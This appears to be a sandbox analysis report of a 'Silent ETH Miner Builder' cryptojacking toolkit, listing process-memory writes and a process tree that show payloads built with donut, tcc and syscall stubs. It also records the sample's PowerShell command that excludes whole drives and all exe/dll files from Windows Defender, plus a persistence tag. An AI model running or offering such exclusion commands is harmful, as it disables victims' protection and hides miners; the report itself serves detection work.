PID 3324 wrote to memory of 5544 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 3324 wrote to memory of 5544 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 5544 wrote to memory of 5548 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 5544 wrote to memory of 5548 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 5544 wrote to memory of 5548 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 5548 wrote to memory of 5520 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 5548 wrote to memory of 5520 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 5548 wrote to memory of 5520 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 4304 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe
PID 4304 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe
PID 4304 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe
PID 4304 wrote to memory of 3504 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe
PID 4304 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4304 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5100 wrote to memory of 484 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5100 wrote to memory of 484 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4304 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4304 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5196 wrote to memory of 1172 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5196 wrote to memory of 1172 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4304 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 4304 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 1948 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 1948 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 1948 wrote to memory of 4404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 4404 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4404 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4404 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 6040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 2184 wrote to memory of 6040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 2184 wrote to memory of 6040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 6040 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 6040 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 6040 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe
PID 4304 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe
PID 4304 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe
PID 4304 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe
PID 4304 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe
PID 4304 wrote to memory of 5408 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 4304 wrote to memory of 5408 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe C:\Windows\SYSTEM32\cmd.exe
PID 5408 wrote to memory of 4976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 5408 wrote to memory of 4976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 5408 wrote to memory of 4976 N/A C:\Windows\SYSTEM32\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe
PID 4976 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4976 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4976 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe C:\Windows\SysWOW64\cmd.exe
PID 4000 wrote to memory of 5936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 4000 wrote to memory of 5936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 4000 wrote to memory of 5936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe
PID 5936 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\whoisthisugly's RAT set.rar"

C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe

"C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zqlo2ilv\zqlo2ilv.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES127.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCF08CCC66BD4841DBA5321FC7798AD82C.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-watchdog.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd-watchdog-loader.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hlw5xyul\hlw5xyul.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14DE.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSC642E21C08BFA400D8E46E2C8B0DF89D4.TMP"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hmbilsec\hmbilsec.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F40.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSC711695CF99D449E5B3C16096BBFDCDBE.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-uninstaller-payload.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd-uninstaller.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-miner.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xioxjlcu\xioxjlcu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA09.tmp" "c:\Users\Admin\Downloads\CSC3EFC9AFFD274DC585B4E053164182.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\Downloads\Compilers\donut\donut.exe

"C:\Users\Admin\Downloads\Compilers\donut\donut.exe" "C:\Users\Admin\Downloads\ddd-watchdog.exe" -a 2 -f 1

C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe

"C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd-watchdog-loader.c" resource.o "C:\Users\Admin\Downloads\Includes\syscalls.c" -xa "C:\Users\Admin\Downloads\Includes\syscallsstubs.asm"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5u5m2zkm\5u5m2zkm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB69C.tmp" "c:\Users\Admin\Downloads\CSC6007CC3DEFCE40978BB523AA9D26AF2A.TMP"

C:\Users\Admin\Downloads\ddd-miner.exe

"C:\Users\Admin\Downloads\ddd-miner.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Users\Admin\Downloads\ddd-miner.exe

"C:\Users\Admin\Downloads\ddd-miner.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Users\Admin\Downloads\ddd-miner.exe

"C:\Users\Admin\Downloads\ddd-miner.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost32"

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tceimwir\tceimwir.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7911.tmp" "c:\Users\Admin\Downloads\CSC26FF11C39DE54EB4BCAF1EE39D36238D.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\Downloads\Compilers\donut\donut.exe

"C:\Users\Admin\Downloads\Compilers\donut\donut.exe" "C:\Users\Admin\Downloads\ddd-uninstaller-payload.exe" -a 2 -f 1

C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe

"C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd-uninstaller.c" resource.o "C:\Users\Admin\Downloads\Includes\syscalls.c" -xa "C:\Users\Admin\Downloads\Includes\syscallsstubs.asm"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\Downloads\Compilers\donut\donut.exe

"C:\Users\Admin\Downloads\Compilers\donut\donut.exe" "C:\Users\Admin\Downloads\ddd-miner.exe" -a 2 -f 1

C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe

"C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd.c" resource.o "C:\Users\Admin\Downloads\Includes\syscalls.c" -xa "C:\Users\Admin\Downloads\Includes\syscallsstubs.asm"

C:\Users\Admin\Downloads\ddd.exe

"C:\Users\Admin\Downloads\ddd.exe"

